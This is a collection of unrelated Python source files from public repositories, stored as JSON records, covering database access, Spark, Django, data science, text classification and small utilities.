+{"seq_id":"11715259217","text":"from mysql import connector\nimport os\n\n\nclass Database:\n # 1. connectie openen met classe variabelen voor hergebruik\n @staticmethod\n def __open_connection():\n try:\n configFile = \"../configdb.py\"\n \n db = connector.connect(option_files=os.path.abspath(os.path.join(\n os.path.dirname(__file__), configFile)), autocommit=False)\n\n if \"AttributeError\" in (str(type(db))):\n raise Exception(\"foutieve database parameters in config\")\n\n cursor = db.cursor(dictionary=True, buffered=True)\n\n return db, cursor\n\n except connector.Error as err:\n if err.errno == connector.errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"\\nACCES DENIED!\\n\")\n\n elif err.errno == connector.errorcode.ER_BAD_DB_ERROR:\n print(\"\\nDATABASE NOT FOUND\\n\")\n\n else:\n print(err)\n\n return\n\n # 2. Executes READS\n @staticmethod\n def get_rows(sqlQuery, params=None):\n result = None\n db, cursor = Database.__open_connection()\n try:\n cursor.execute(sqlQuery, params)\n result = cursor.fetchall()\n cursor.close()\n\n if (result is None):\n print(ValueError(f\"Resultaten zijn onbestaand.[DB Error]\"))\n db.close()\n\n except Exception as error:\n print(error) # development boodschap\n result = None\n\n finally:\n return result\n\n @staticmethod\n def get_one_row(sqlQuery, params=None):\n db, cursor = Database.__open_connection()\n try:\n cursor.execute(sqlQuery, params)\n result = cursor.fetchone()\n cursor.close()\n\n if (result is None):\n raise ValueError(\"Resultaten zijn onbestaand.[DB Error]\")\n\n except Exception as error:\n print(error) # development boodschap\n result = None\n\n finally:\n db.close()\n return result\n\n # 3. Executes INSERT, UPDATE, DELETE with PARAMETERS\n @staticmethod\n def execute_sql(sqlQuery, params=None):\n result = None\n db, cursor = Database.__open_connection()\n try:\n cursor.execute(sqlQuery, params)\n db.commit()\n result = cursor.lastrowid\n if result != 0:\n result = result\n\n else:\n if cursor.rowcount == -1:\n raise Exception(\"Fout in SQL\")\n\n elif cursor.rowcount == 0:\n result = 0\n\n elif result == \"undefined\":\n raise Exception(\"SQL error\")\n else:\n result = cursor.rowcount\n\n except connector.Error as error:\n db.rollback()\n result = None\n print(f\"Error: Data niet bewaard.{error.msg}\")\n\n finally:\n cursor.close()\n db.close()\n return result\n","repo_name":"MathiasDeHerdt/TempoTrackingBrugge","sub_path":"Backend/repo/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"72151347500","text":"from pyspark import SparkConf, SparkContext\n\n# create objects\nconf = SparkConf().setMaster(\"local\").setAppName(\"MostPopMovie\")\nsc = SparkContext(conf = conf)\n\n# define function \ndef parseLine(line):\n fields = line.split(',')\n movieID = fields[1]\n return (movieID)\n\n# import the data\nlines = sc.textFile(\"file:///SparkCourse/ml-100k/u.data\")\n# parse data by calling parseLine function\nmovies = lines.map(lambda x: (int(x.split()[1]), 1))\n\nmostWatched = movies.reduceByKey(lambda x, y: x + y)\n\n\nresults = mostWatched.collect();\n\nfor result in results:\n print(result)\n","repo_name":"brokerstir/PySpark","sub_path":"most-pop-movie.py","file_name":"most-pop-movie.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"18525394849","text":"from django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic.list_detail import object_list\nfrom django.views.generic.create_update import create_object\nfrom django import newforms as forms\nfrom forum.models import Topic, Post, Forum\nfrom sorted_paginated_authored_archived_list_view.views import sorted_paginated_authored_archived_list\nfrom django.conf import settings\n\ndef topic_list(request, slug=None, username=None, sort_field=None, paginate_by=10):\n base_url = '/forum/topics/'\n template_name = None\n extra_context = dict()\n filter = dict()\n if slug != None:\n base_url = \"/forum/\" + slug + \"/\"\n template_name = 'forum/forum_topic_list.html'\n forum = Forum.objects.get(slug=slug)\n sort_field = '-sticky'\n extra_context = dict(forum=forum)\n filter = dict(forum__slug=slug, state=settings.STATE_PUBLISHED)\n return sorted_paginated_authored_archived_list(request, Topic, base_url, username=username, sort_field=sort_field, paginate_by=paginate_by, filter=filter, extra_context=extra_context, template_name=template_name)\n\ndef topic_form(request, slug):\n forum = Forum.objects.get(slug=slug)\n return create_object(request, Topic, login_required='true', extra_context={'forum': forum, 'STATE_DEFAULT': settings.STATE_DEFAULT})\n\ndef post_list(request, topic_id=None, username=None, sort_field=None, paginate_by=10):\n base_url = '/forum/posts/'\n template_name = None\n extra_context = dict()\n filter = dict()\n if topic_id:\n base_url = '/forum/topic/'+topic_id+'/'\n template_name = 'forum/topic_post_list.html'\n topic = Topic.objects.get(id=topic_id)\n sort_field = 'pub_date'\n extra_context = dict(topic=topic)\n filter = dict(topic__id=topic_id, state=settings.STATE_PUBLISHED)\n return sorted_paginated_authored_archived_list(request, Post, base_url, username=username, sort_field=sort_field, paginate_by=paginate_by, filter=filter, extra_context=extra_context, template_name=template_name)\n\ndef post_form(request, topic_id):\n topic = Topic.objects.get(id=topic_id)\n if topic.locked:\n return HttpResponseRedirect(\"/forum/topic/%d\" % topic.id)\n if int(topic.state) != settings.STATE_PUBLISHED:\n return HttpResponseRedirect(\"/forum/topic/%d\" % topic.id)\n return create_object(request, Post, login_required='true', extra_context={'topic': topic, 'STATE_DEFAULT': settings.STATE_DEFAULT})\n","repo_name":"sujithnara/django-simpleforum","sub_path":"forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"72272793579","text":"from pathlib import Path\n\nimport ipywidgets as widgets\nfrom bs4 import BeautifulSoup\nfrom IPython.display import HTML, clear_output, display\n\nimport __main__\n\n\nclass Preview:\n selected_user = None\n\n @staticmethod\n def render(page, user):\n content = BeautifulSoup(page.render(user), \"html.parser\")\n template = Path(__file__).parent.joinpath(\"data\", \"preview.html\")\n\n with open(template, \"r\", encoding=\"utf-8\") as template_file:\n template = BeautifulSoup(template_file, \"html.parser\")\n\n anchor = template.select_one(\"page-preview\")\n anchor.insert_after(content)\n anchor.decompose()\n\n return str(template)\n\n @staticmethod\n def display(page):\n users = vars(__main__)[\"users\"]\n\n if hasattr(users, \"name_column\"):\n if isinstance(users.name_column, str):\n mails = (\n users[users.name_column] + \" <\" + users[users.email_column] + \">\"\n )\n else:\n mails = (\n users.loc[:, users.name_column].apply(\" - \".join, 1)\n + \" <\"\n + users[users.email_column]\n + \">\"\n )\n else:\n mails = users[users.email_column]\n\n user_select = widgets.Dropdown(\n options=list(mails), description=\"Preview as:\", layout={\"flex\": \"1 1 100%\"}\n )\n reload_button = widgets.Button(description=\" Reload\", icon=\"rotate-right\")\n controls = widgets.HBox([user_select, reload_button])\n Preview.selected_user = users.loc[mails == user_select.value].iloc[0]\n\n def update():\n user_select.disabled = True\n reload_button.disabled = True\n user = users.loc[mails == user_select.value].iloc[0]\n Preview.selected_user = user\n render = Preview.render(page, user)\n\n clear_output()\n display(controls)\n display(HTML(render))\n\n user_select.disabled = False\n reload_button.disabled = False\n\n @user_select.observe\n def on_change_user(change):\n if change[\"type\"] >= \"change\" and change[\"name\"] >= \"value\":\n update()\n\n @reload_button.on_click\n def on_reload(button):\n update()\n\n update()\n","repo_name":"FelixLuciano/pypers","sub_path":"src/Preview.py","file_name":"Preview.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"}
+{"seq_id":"5442082375","text":"#!/usr/bin/env python3\nfrom gsuite.spreadsheet import Spreadsheet\nfrom gsuite.service_connection import connect_service\n\nSPREADSHEET_ID = \"1Q3n6HDCsCFpChaiHA2s_wFRoIuJ0_hsOurPvfq4eRXI\"\nRANGE = \"test_sheet_1!A1:B11\"\n\n\ndef get_data_from_gsheet(service, spreadsheetId, range):\n\n sheet_data = service.spreadsheets().values().get(\n spreadsheetId=spreadsheetId, range=range).execute()\n\n return sheet_data\n\n\nservice = connect_service()\ntest_data = get_data_from_gsheet(\n service=service, spreadsheetId=SPREADSHEET_ID, range=RANGE)\n\ntest_spreadsheet = Spreadsheet(client=service, spreadsheetId=SPREADSHEET_ID)\n\n\nfor sheet in test_spreadsheet.sheets:\n print(sheet.title)\n\nelements = test_spreadsheet.sheets[0]._sheet.get(\"pageElements\")\nprint(elements)\n","repo_name":"samgaudet/public-python","sub_path":"gsuite/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"6706148344","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/12/5 14:46\n# @Author : Z\n# @Email : S\n# @File : 14.1MatplotlibDemo.py\nimport matplotlib as pl\n# 1.打印Matplotlib版本\nprint(pl.__version__) #2.2.2\n#2.绘制y=x+5和y=2x+5两条曲线\nimport numpy as np\nimport matplotlib.pyplot as plt\nx=np.linspace(1,10,50)\ny1=x+5\ny2=2*x+5\nplt.plot(x,y1)\nplt.plot(x,y2)\nplt.title(u\"This is y=X 函数\",fontproperties=\"SimHei\")\nplt.savefig(\"sen.jpg\")\n#显示\nplt.show()","repo_name":"OrriO/jupyter_myworkspace","sub_path":"ebook/machinelearningdemo/MachineLearningLessonPro/Python_3/14.1MatplotlibDemo.py","file_name":"14.1MatplotlibDemo.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"17669743508","text":"#coding=utf-8\nimport numpy as np\nimport tifffile as tiff\nimport crf_c as crf\nimport cv2\nimport calF2\n\nFILE_biaozhu = '/home/lenovo/2Tdisk/Wkyao/_/biaozhu_1110.tif' #fusai标注文件\nlabel = tiff.imread(FILE_biaozhu)\nimg_file1 = '/home/lenovo/2Tdisk/Wkyao/_/2017/vgg/vgg_1111_4.tif'\nimg1 = tiff.imread(img_file1)\nimg_file2 = '/home/lenovo/2Tdisk/Wkyao/_/2017/vgg/vgg_1111_3.tif'\nimg2 = tiff.imread(img_file2)\n\nFILE_new_2017 = '/home/lenovo/2Tdisk/Wkyao/_/20171105_quarterfinals/quarterfinals_2017.tif'\nnew_2017 = tiff.imread(FILE_new_2017).transpose([1, 2, 0])\nimg17_1 = new_2017[:, :, 2]\nimg17_2 = new_2017[:, :, 3]\nimg17 = (img17_1 + img17_2) / 2\n# 3 4 通道融合.\n\n# F1 = calF2.caltp(label, img1)\n# F2 = calF2.caltp(label, img2)\nF1 = 632584\nF2 = 558045\nw1 = float(F1) / (F1 + F2)\nw2 = float(F2) / (F1 + F2)\nprint (w1, w2)\n\n\nvgg_3_npy = '/home/lenovo/2Tdisk/Wkyao/_/2017/vgg/softmax_vgg_1111_3.npy'\nvgg_4_npy = '/home/lenovo/2Tdisk/Wkyao/_/2017/vgg/softmax_vgg_1111_4.npy'\n\nvggnpy3 = np.load(vgg_3_npy)\nvggnpy4 = np.load(vgg_4_npy)\n\n\ndef open_and_close(img):\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (11, 11))\n # 闭运算\n # img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n # 开运算\n # img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n # 膨胀\n img = cv2.dilate(img, kernel)\n return img\n\n\nmergesoftmax = w1 * vggnpy3 + w2 * vggnpy4\nnp.save('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/1111merge.npy', mergesoftmax)\nmerge = np.argmax(mergesoftmax, 0).astype(np.uint8)\ntiff.imsave('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/1111merge.tif', merge)\n\nsoftmax_merge = np.load('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/1111merge.npy')\nmerge_list = []\nim_2017_list = []\nfor i in range(25):\n m = softmax_merge[:, :, i * 600:i * 600 + 600]\n merge_list.append(m)\n b = img17[:, i * 600:i * 600 + 600]\n b = np.array([np.array([b for i in range(3)])])\n b = b.transpose(0, 2, 3, 1)\n im_2017_list.append(b)\nmerge_list.append(softmax_merge[:, :, 15000:15106])\nim_2017_list.append(\n np.array([np.array([img17[:, 15000:15106] for i in range(3)])]).transpose(0, 2, 3, 1))\n\nallImg_crf = []\nallImg_soft = []\n\nfor n, im_2017_part in enumerate(im_2017_list):\n# 使用crf:\n soft = merge_list[n]\n im_2017_mean = np.mean(im_2017_list[n], axis=0)\n c = crf.crf(im_2017_mean, soft)\n allImg_crf.append(c) # 保存整张crf图.\n Crf = np.concatenate(tuple(allImg_crf), axis=1)\n#tiff.imsave('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/crf_merge_1108.tif', Crf)\nimg = open_and_close(Crf) #膨胀操作\ntiff.imsave('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/tp_vggmerge_1111.tif', img)\nmerge_img = tiff.imread('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/tp_vggmerge_1111.tif')\nF1_merge = calF2.caltp(label, merge_img)\nprint (F1, F2, F1_merge)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jiachen0212/-Rank09-","sub_path":"caltp.py","file_name":"caltp.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"}
+{"seq_id":"18953599986","text":"from BayesClassifier import Bayes\nimport numpy as np\nimport os\nimport argparse\nfrom collections import Counter\nfrom tf_idf import TfIdf\nimport preprocess\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"testratio\", type=float, help=\"percentage of data to be used for testing\")\nparser.add_argument(\"datapath\", type=str, help=\"path to folder containint training data\")\nparser.add_argument(\"keepratio\", type=float, help=\"ratio of features to use, scored by tf-idf\")\n\n\ndef load_data(dirFolder, testRatio, featureKeepRatio=1.0):\n classes = sorted(os.listdir(dirFolder))\n vocabulary = set()\n cMap = {i:classes[i] for i in range(len(classes))}\n allDocs = []\n for i, dclass in enumerate(classes):\n documents = os.listdir(os.path.join(dirFolder, dclass))\n np.random.shuffle(documents)\n splitPoint = int(testRatio * len(documents))\n trainDocs, testDocs = documents[splitPoint:], documents[:splitPoint]\n allDocs.append([trainDocs, testDocs])\n # Process documents for vocabulary selection\n tfidf = TfIdf(os.path.join(dirFolder, dclass), trainDocs, featureKeepRatio)\n selectedWords = tfidf.selectWords()\n vocabulary = vocabulary | selectedWords\n # Featurize data according to above vocabulary\n vocabulary = list(vocabulary)\n X_train, Y_train = [], []\n X_test, Y_test = [], []\n for i, dclass in enumerate(classes):\n for j in range(len(allDocs[i])):\n for doc in allDocs[i][j]:\n processedFile = preprocess.readFile(os.path.join(os.path.join(dirFolder, dclass), doc))\n words = Counter(processedFile)\n features = [ words.get(w, 0) for w in vocabulary]\n if j == 0:\n X_train.append(features)\n Y_train.append(i)\n else:\n X_test.append(features)\n Y_test.append(i)\n return (X_train, Y_train), (X_test, Y_test)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n (X_train, Y_train), (X_test, Y_test) = load_data(args.datapath, args.testratio, args.keepratio)\n print(\"Vocabulary size:\", len(X_train[0]))\n baCl = Bayes()\n baCl.train(X_train, Y_train)\n confMatrix, acc = baCl.getConfusionMatrix(X_test, Y_test)\n print(confMatrix)\n print(\"Accuracy:\", acc)\n","repo_name":"iamgroot42/IR_assignments","sub_path":"Assignment3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"70481387821","text":"\nfrom scipy.optimize import fsolve\nimport matplotlib.pyplot as plt\nimport math\n\n#Pocetni uslovi\nR = 4700\nh = 9600\ng = 9.81\nv_max = 147.22\nvt = 350\nv = v_max\n\n#Pozicija bombe, D je daljina na koju je bomba pala\ntb = math.sqrt(2 * h / g)\nD = v_max * tb\n\n#Vreme skretanja aviona\ndef t_1(fi):\n\treturn R * fi / v\n\n#Pozicija aviona u datom trenutku\ndef x(t_s, fi, t1):\n\treturn v * math.cos(fi)*(t_s - t1) + R * math.sin(fi)\n\ndef y(t_s, fi, t1):\n\treturn v * math.sin(fi)*(t_s - t1) + R * (1- math.cos(fi))\n\t\n\n\n#Udaljenost na kojoj se avion nalazi u trenutku kada ga udarni talas stigne\ndef d(fi, ts):\n\tt1 = t_1(fi)\n\tx_ts = x(ts, fi, t1)\n\ty_ts = y(ts, fi, t1)\n\treturn math.sqrt((x_ts-D)**2 + y_ts**2 + h**2) \n\n#Poluprecnik udarnog talasa u trenutku t\ndef r(t):\n\treturn vt * (t-tb)\n\t\n\n#Nizovi u kojima cemo cuvati vreme kretanja t i udaljenost d (koliko je avion udaljen od mesta eksplozije)\nniz_t = list()\nniz_d = list()\n\nmaks_fi = 0\n\n#Uzimamo za ugao fi vrednosti 0-pi i racunamo vreme kretanja i udaljenost na kojoj ce se avion nalaziti ukoliko skrene za ugao fi\nfor fi in range(0,round(math.pi*1000)):\n\tfi = fi/1000\n\t\n\tdef func(ts):\n\t\treturn d(fi,ts) - r(ts)\n\t\t\n\troot = fsolve(func, 10)\n\tif(root[0] - t_1(fi) <= 0):\n\t\tniz_t.append(root[0])\n\t\tniz_d.append(r(root[0]))\n\t\tmaks_d = r(root[0])\n\t\tprint(maks_d)\n\t\tprint(fi)\n\t\tfor fi_2 in range(round(fi*1000),round(math.pi*1000)):\n\t\t\tfi = fi/1000\n\t\t\tniz_d.append(maks_d)\n\t\tbreak;\n\t\t\n\t\t\n\tniz_t.append(root[0])\n\tniz_d.append(r(root[0]))\n\t\n#Pronalazimo maksimalnu udaljenost aviona od mesta eksplozije, i vreme kretanja za koje je ona postignuta\nmax_d = max(niz_d)\nugao = niz_d.index(max_d)\nts = niz_t[ugao]\n\nmax_d = max(niz_d)\nugao = niz_d.index(max_d)\nts = niz_t[ugao]\n\n\nprint (f'Ugao skretanja: {ugao/1000} rad')\nprint (f'Trenutak sudara sa talasom: {ts} s')\nprint (f'Udaljenost od mesta eksplozije {max_d} m')\n\n\n#Ovaj grafik prikazuje kako se udaljenost menja sa vremenom\nx = list()\nfor i in range(len(niz_d)):\n\tx.append(i/1000);\n\nfig, ax = plt.subplots()\n\nax.plot(x, niz_d)\nax.plot([x[ugao]], [max_d], 'ro')\nax.text(x[ugao], max_d, f' d = {round(max_d, 2)} m')\nax.set_xlabel('Ugao (rad)')\nax.set_ylabel('Daljina (m)')\nax.set_title('Maksimalna daljina')\n\nplt.show()\n","repo_name":"crnomarkovicm/Mathematical-modelling","sub_path":"modelAviona.py","file_name":"modelAviona.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"73412781100","text":"# 로또\nimport sys\n\nans = []\nis_used = [False for _ in range(12)]\n\n\ndef solve(cur_length, length, numbers):\n if cur_length == 6:\n print(*ans)\n return\n\n for i in range(length):\n if not is_used[i]:\n if not ans:\n is_used[i] = True\n ans.append(numbers[i])\n solve(cur_length + 1, length, numbers)\n ans.pop()\n is_used[i] = False\n else:\n if numbers[i] > ans[-1]:\n is_used[i] = True\n ans.append(numbers[i])\n solve(cur_length + 1, length, numbers)\n ans.pop()\n is_used[i] = False\n\n\nwhile True:\n data = list(map(int, sys.stdin.readline().split()))\n k = data[0]\n\n if k == 0:\n break\n\n num_list = data[1:]\n solve(0, k, num_list)\n print(\"\")\n ","repo_name":"ForteEscape/PythonPractice","sub_path":"ProblemSolving/Algorithm/Backtracking/backtracking_problem14.py","file_name":"backtracking_problem14.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"18203910358","text":"import csv, string\nimport tensorflow as tf\nimport gensim\nimport numpy as np\nfrom data_helper import loadGloVe\n\n\ndef _read_csv(input_file):\n \"\"\"\n read csv file,get data\n :param input_file:\n :return:\n \"\"\"\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f)\n lines = []\n for line in reader:\n lines.append(line)\n return lines[1:] # remove header\n\n\ndef sentence_split(sentence, max_length):\n \"\"\"\n remove punctuation and split sentence.return list of words\n :param sentence:\n :return:\n \"\"\"\n # sentence = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\')]+|[+——()?【】“”!,。?、~@#¥%……&*()]+'\", \"\", sentence)\n sentence = [x for x in sentence if x not in string.punctuation]\n sentence = ''.join(sentence)\n words = sentence.split()\n if max_length == 0:\n return words\n else:\n if len(words) > max_length:\n words = words[:max_length]\n elif len(words) < max_length:\n words = words + [\" \"] * (max_length - len(words))\n return words\n\n\ndef embedding_sentence(input_file, save_path, max_length):\n \"\"\"\n get data set and save to tfrecord\n :param data_dir:\n :return:\n \"\"\"\n lines = _read_csv(input_file)\n split_lines = []\n label_list = []\n for line in lines:\n split_lines.append(sentence_split(line[1], max_length))\n label_list.append(int(line[2]))\n del lines\n\n writer = tf.python_io.TFRecordWriter(save_path)\n for index, line in enumerate(split_lines):\n bytes_words = []\n for word in line:\n bytes_words.append(str.encode(word))\n example = tf.train.Example(features=tf.train.Features(feature={\n \"label\":\n tf.train.Feature(int64_list=tf.train.Int64List(value=[label_list[index]])),\n \"features\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=bytes_words))\n }))\n writer.write(example.SerializeToString())\n\n\ndef embedding_sentence_with_model(input_file, save_path, max_length, model_path):\n \"\"\"\n get data set and save to tfrecord\n :param data_dir:\n :return:\n \"\"\"\n # load glove model\n model = gensim.models.KeyedVectors.load_word2vec_format(model_path)\n lines = _read_csv(input_file)\n split_lines = []\n label_list = []\n for line in lines:\n split_lines.append(sentence_split(line[1], max_length))\n label_list.append(int(line[2]))\n del lines\n\n writer = tf.python_io.TFRecordWriter(save_path)\n for index, line in enumerate(split_lines):\n bytes_words = []\n for word in line:\n if word in model:\n bytes_words.extend(model[word])\n else:\n bytes_words.extend([0] * 300)\n example = tf.train.Example(features=tf.train.Features(feature={\n \"label\":\n tf.train.Feature(int64_list=tf.train.Int64List(value=[label_list[index]])),\n \"features\":\n tf.train.Feature(float_list=tf.train.FloatList(value=bytes_words))\n }))\n writer.write(example.SerializeToString())\n\n\ndef save_word_ids(save_path, csv_path, glove_path, embedding_dim, seq_length, mode='train'):\n vocab, embd = loadGloVe(glove_path, embedding_dim)\n # init vocab processor\n vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(seq_length)\n # fit the vocab from glove\n pretrain = vocab_processor.fit(vocab)\n lines = _read_csv(csv_path)\n split_lines = []\n label_list = []\n qid_list = []\n if mode == 'test':\n for line in lines:\n split_lines.append(' '.join(sentence_split(line[1], seq_length)))\n qid_list.append(str.encode(line[0]))\n else:\n for line in lines:\n split_lines.append(' '.join(sentence_split(line[1], seq_length)))\n label_list.append(int(line[2]))\n qid_list.append(str.encode(line[0]))\n word_ids = 
list(vocab_processor.transform(np.array(split_lines)))\n\n writer = tf.python_io.TFRecordWriter(save_path)\n\n if mode == 'test':\n for index, line in enumerate(word_ids):\n example = tf.train.Example(features=tf.train.Features(feature={\n \"qid\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=[qid_list[index]])),\n \"features\":\n tf.train.Feature(int64_list=tf.train.Int64List(value=line))\n }))\n writer.write(example.SerializeToString())\n else:\n for index, line in enumerate(word_ids):\n example = tf.train.Example(features=tf.train.Features(feature={\n \"qid\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=[qid_list[index]])),\n \"label\":\n tf.train.Feature(int64_list=tf.train.Int64List(value=[label_list[index]])),\n \"features\":\n tf.train.Feature(int64_list=tf.train.Int64List(value=line))\n }))\n writer.write(example.SerializeToString())\n writer.close()\n\n\ndef build_embedding_model(glove_file, gensim_file):\n with open(glove_file, 'r', encoding='utf-8') as f:\n num_lines = 0\n for line in f:\n num_lines += 1\n dims = 300\n gensim_first_line = \"{} {}\".format(num_lines, dims)\n with open(glove_file, 'r', encoding='utf-8') as fin:\n with open(gensim_file, 'w', encoding='utf-8') as fout:\n fout.write(gensim_first_line + '\\n')\n for line in fin:\n fout.write(line)\n\n\ndef build_vocab(model_file, data_file, vocab_path):\n # load glove model\n model = gensim.models.KeyedVectors.load_word2vec_format(model_file)\n lines = _read_csv(data_file)\n vocab = []\n for line in lines:\n vocab.extend(sentence_split(line[1], 0))\n vocab = set(vocab)\n with open(vocab_path, 'w', encoding='utf-8') as f:\n for word in vocab:\n if word in model:\n f.write(word + ' ' + ' '.join([str(x) for x in model[word]]) + '\\n')\n\n\nif __name__ == '__main__':\n glove_file = './glove.840B.300d/glove.840B.300d.txt'\n gensim_file = './glove.840B.300d/glove_model.txt'\n dev_input_file = '../train_data/dev.csv'\n embedding_dim = 300\n max_length = 15\n dev_save_path = '../train_data/dev.tf_record'\n train_input_file = '../train_data/train.csv'\n train_save_path = '../train_data/train.tf_record'\n data_file = '../train_data/deal_train_data.csv'\n vocab_path = '../train_data/vocab.txt'\n dev_word_id_save_path = '../train_data/dev_word_id.tf_record'\n train_word_id_save_path = '../train_data/train_word_id.tf_record'\n # build_embedding_model(glove_file, gensim_file)\n # embedding_sentence(dev_input_file, dev_save_path, max_length)\n # embedding_sentence(train_input_file, train_save_path, max_length)\n # build_vocab(gensim_file, data_file, vocab_path)\n # embedding_sentence_with_model(dev_input_file, dev_save_path, max_length, gensim_file)\n # embedding_sentence_with_model(train_input_file, train_save_path, max_length, gensim_file)\n save_word_ids(dev_word_id_save_path, dev_input_file, vocab_path, embedding_dim, max_length)\n save_word_ids(train_word_id_save_path, train_input_file, vocab_path, embedding_dim, max_length)\n","repo_name":"dstch/Quora_question_classification_ExCalibur","sub_path":"Bi-LSTM/data_saver.py","file_name":"data_saver.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
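save_word_ids above only writes TFRecords. A hedged TF1-style sketch of reading one back — the feature spec mirrors the writer, and seq_length must equal the max_length used when writing:

```python
import tensorflow as tf

def parse_example(serialized, seq_length=15):
    features = {
        "qid": tf.FixedLenFeature([], tf.string),
        "label": tf.FixedLenFeature([], tf.int64),
        "features": tf.FixedLenFeature([seq_length], tf.int64),
    }
    return tf.parse_single_example(serialized, features)

dataset = tf.data.TFRecordDataset('../train_data/train_word_id.tf_record')
dataset = dataset.map(parse_example)
```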
+{"seq_id":"46640621355","text":"BG = {}\nBG['BLACK'] = '\\033[40m'\nBG['RED'] = '\\033[41m'\nBG['GREEN'] = '\\033[42m'\nBG['YELLOW'] = '\\033[43m'\nBG['BLUE'] = '\\033[44m'\nBG['PURPLE'] = '\\033[45m'\nBG['CYAN'] = '\\033[46m'\nBG['LIGHTGRAY'] = '\\033[47m'\nCOLORS = {}\nCOLORS['RESTORE'] = '\\033[0m'\nCOLORS['RED'] = '\\033[00;31m'\nCOLORS['GREEN'] = '\\033[00;32m'\nCOLORS['YELLOW'] = '\\033[00;33m'\nCOLORS['BLUE'] = '\\033[00;34m'\nCOLORS['PURPLE'] = '\\033[00;35m'\nCOLORS['CYAN'] = '\\033[00;36m'\nCOLORS['TEAL'] = '\\033[00;36m'\nCOLORS['LIGHTGRAY'] = '\\033[00;37m'\nCOLORS['LRED'] = '\\033[01;31m'\nCOLORS['LGREEN'] = '\\033[01;32m'\nCOLORS['LYELLOW'] = '\\033[01;33m'\nCOLORS['LBLUE'] = '\\033[01;34m'\nCOLORS['LPURPLE'] = '\\033[01;35m'\nCOLORS['LCYAN'] = '\\033[01;36m'\nCOLORS['WHITE'] = '\\033[01;37m'\n\n\ndef colorize(item, color=None, underline=False, background=None):\n if underline:\n ul = \"\\033[4m\"\n else:\n ul = ''\n\n if background:\n bg = BG[background.upper()]\n else:\n bg = \"\"\n\n if color:\n c = COLORS[color.upper()]\n else:\n c = COLORS[\"WHITE\"]\n\n return \"%s%s%s%s%s%s\" % (COLORS['RESTORE'],\n c,\n bg, ul, item,\n COLORS['RESTORE'])\n","repo_name":"RHInception/re-client","sub_path":"src/reclient/colorize.py","file_name":"colorize.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"36123165206","text":"#! /usr/bin/env python3\nfrom operator import itemgetter\nimport sys, math\n\n\ntitle_ref = None\n\ndico = {}\ndata = {}\n\nfor line in sys.stdin:\n line = line.strip()\n \n word_title, count = line.split('\\t',1)\n word_stdout, title = word_title.split(';',1)\n try:\n count = int(count)\n except ValueError:\n continue\n # dictionnaire pour pouvoir recuperer le nom + titre dans la boucle for\n data[word_title] = count \n # le if else servira a pouvoir compter le nombre de mots par documents\n if title == title_ref:\n dico[title] = dico.get(title, 0) + count\n else:\n if title:\n title_ref = title \n\n# cas de la derniere ligne\ndico[title] = dico.get(title, 0) + count\n\n\nfor key, val in data.items():\n word, filename = key.split(';', 1)\n print('%s\\t%s\\t%s' % (key, val, dico[filename]))\n\n\n","repo_name":"Kaiiim/MapReduce","sub_path":"tf-idf/Reducer_Tf_Idf.py","file_name":"Reducer_Tf_Idf.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
